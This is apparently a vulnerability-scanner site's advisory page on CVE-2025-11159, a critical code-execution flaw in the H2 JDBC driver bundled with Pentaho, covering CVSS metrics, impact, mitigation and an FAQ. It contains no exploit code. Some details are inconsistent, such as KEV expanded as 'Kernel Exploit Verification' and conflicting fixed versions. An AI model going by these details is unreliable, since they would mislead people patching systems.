Gratis scannen
Analyse in behandelingCVE-2025-11159

CVE-2025-11159: External Script Execution in H2 JDBC Driver

Platform

java

Component

h2database

Opgelost in

11.0

Bekijk op NVD
Opslaan

CVE-2025-11159 describes a critical external script execution vulnerability affecting the H2 Database JDBC Driver. This flaw allows an attacker to execute arbitrary code when a new connection is established by a data source administrator. The vulnerability impacts all versions of Hitachi Vantara Pentaho Data Integration & Analytics that utilize the vulnerable JDBC driver (versions 1.0.0 through 11.0). A fix is available in version 11.0.

Java / Maven

Detecteer deze CVE in je project

Upload je pom.xml-bestand en we vertellen je direct of je getroffen bent.

pom.xml uploadenOndersteunde formaten: pom.xml · build.gradle

Impact en Aanvalsscenarioswordt vertaald…

Successful exploitation of CVE-2025-11159 allows an attacker to gain complete control over the affected system. By crafting a malicious JDBC connection request, an attacker can execute arbitrary code within the context of the Pentaho Data Integration & Analytics application. This could lead to data breaches, system compromise, and potentially lateral movement within the network. The impact is particularly severe because the vulnerability is triggered during connection creation, a common and often trusted operation. The ability to execute code on the server hosting Pentaho opens the door to a wide range of malicious activities, including data exfiltration, denial of service, and installation of persistent backdoors. This vulnerability shares similarities with other JDBC injection vulnerabilities where malicious SQL or code can be injected through connection parameters.

Uitbuitingscontextwordt vertaald…

CVE-2025-11159 is currently not listed on KEV (Kernel Exploit Verification). The EPSS (Exploit Prediction Scoring System) score is pending evaluation. No public Proof-of-Concept (PoC) exploits have been publicly disclosed as of the publication date. CISA and the NVD (National Vulnerability Database) published this CVE on 2026-05-13, indicating that the vulnerability is newly disclosed and actively being assessed for potential exploitation.

Dreigingsinformatie

Exploit Status

Proof of ConceptOnbekend
CISA KEVNO
InternetblootstellingHoog

CISA SSVC

Exploitationnone
Automatableno
Technical Impacttotal

CVSS-vector

DREIGINGSINFORMATIE· CVSS 3.1CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H9.1CRITICALAttack VectorNetworkHoe de aanvaller het doel bereiktAttack ComplexityLowVereiste omstandigheden om te exploiterenPrivileges RequiredHighVereist authenticatieniveau voor aanvalUser InteractionNoneOf het slachtoffer actie moet ondernemenScopeChangedImpact buiten het getroffen onderdeelConfidentialityHighRisico op blootstelling van gevoelige dataIntegrityHighRisico op ongeautoriseerde gegevenswijzigingAvailabilityHighRisico op verstoring van dienstennextguardhq.com · CVSS v3.1 Basisscore
Wat betekenen deze metrics?
Attack Vector
Netwerk — op afstand uitbuitbaar via internet. Geen fysieke of lokale toegang vereist.
Attack Complexity
Laag — geen speciale voorwaarden vereist. Betrouwbaar uitbuitbaar.
Privileges Required
Hoog — beheerder of geprivilegieerd account vereist.
User Interaction
Geen — automatische en stille aanval. Slachtoffer doet niets.
Scope
Gewijzigd — aanval kan voorbij het kwetsbare component uitbreiden naar andere systemen.
Confidentiality
Hoog — volledig verlies van vertrouwelijkheid. Aanvaller kan alle gegevens lezen.
Integrity
Hoog — aanvaller kan alle gegevens schrijven, aanpassen of verwijderen.
Availability
Hoog — volledige crash of uitputting van resources. Totale denial of service.

Getroffen Software

Componenth2database
LeverancierHitachi Vantara
Minimumversie1.0.0
Maximumversie11.0
Opgelost in11.0

Zwakheidsclassificatie (CWE)

CWE-1395

Tijdlijn

  1. Reserved
  2. Gepubliceerd

Mitigatie en Workaroundswordt vertaald…

The primary mitigation for CVE-2025-11159 is to upgrade Pentaho Data Integration & Analytics to a version that includes the patched H2 Database JDBC Driver (version 11.0 or later). If immediate upgrading is not possible, consider restricting access to the data source administrator functionality to trusted users only. Implement strict input validation on all connection parameters to prevent malicious code injection. While not a complete solution, a Web Application Firewall (WAF) configured to inspect JDBC connection requests for suspicious patterns could provide a layer of defense. Monitor Pentaho logs for unusual connection attempts or errors that might indicate exploitation. After upgrading, confirm the fix by attempting to create a new JDBC connection with a potentially malicious payload – it should be rejected.

Hoe te verhelpenwordt vertaald…

Actualice el controlador JDBC de H2 a la versión 10.2.0.7 o superior, o a la versión 11.0 o superior, para mitigar la vulnerabilidad de ejecución de scripts externos.  Verifique la configuración de la fuente de datos para asegurar que solo usuarios autorizados puedan crear nuevas conexiones. Consulte la documentación de Hitachi Vantara Pentaho para obtener instrucciones específicas de actualización.

Veelgestelde vragenwordt vertaald…

What is CVE-2025-11159 — External Script Execution in H2 JDBC Driver?

CVE-2025-11159 is a critical vulnerability in the H2 Database JDBC Driver affecting versions 1.0.0–11.0. It allows an attacker to execute arbitrary code through a malicious JDBC connection request, impacting Pentaho Data Integration & Analytics deployments.

Am I affected by CVE-2025-11159 in H2 JDBC Driver?

You are affected if you use Hitachi Vantara Pentaho Data Integration & Analytics and are using the H2 Database JDBC Driver in versions 1.0.0 through 11.0. Verify your Pentaho version and JDBC driver version to determine your risk.

How do I fix CVE-2025-11159 in H2 JDBC Driver?

Upgrade Pentaho Data Integration & Analytics to a version that includes the patched H2 Database JDBC Driver (version 11.0 or later). Restrict data source administrator access and validate connection parameters as an interim measure.

Is CVE-2025-11159 being actively exploited?

As of the publication date, no public Proof-of-Concept (PoC) exploits have been publicly disclosed. However, given the vulnerability's criticality, active exploitation is possible and should be monitored for.

Where can I find the official Hitachi Vantara advisory for CVE-2025-11159?

Refer to the Hitachi Vantara security advisory for CVE-2025-11159, which can be found on the Hitachi Vantara support website. Search for 'CVE-2025-11159 Hitachi Vantara' to locate the relevant advisory.

Is jouw project getroffen?

Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.

Gratis scannenCVEs zoeken
Java / Maven

Detecteer deze CVE in je project

Upload je pom.xml-bestand en we vertellen je direct of je getroffen bent.

pom.xml uploadenOndersteunde formaten: pom.xml · build.gradle
livefree scan

Scan nu uw Java / Maven project — geen account

Upload your pom.xml and get the vulnerability report instantly. No account. Uploading the file is just the start: with an account you get continuous monitoring, Slack/email alerts, multi-project and white-label reports.

Manual scanSlack/email alertsscanZone.capMonitorWhite-label reports

Sleep uw afhankelijkheidsbestand hierheen

composer.lock, package-lock.json, requirements.txt, Gemfile.lock, pubspec.lock, Dockerfile...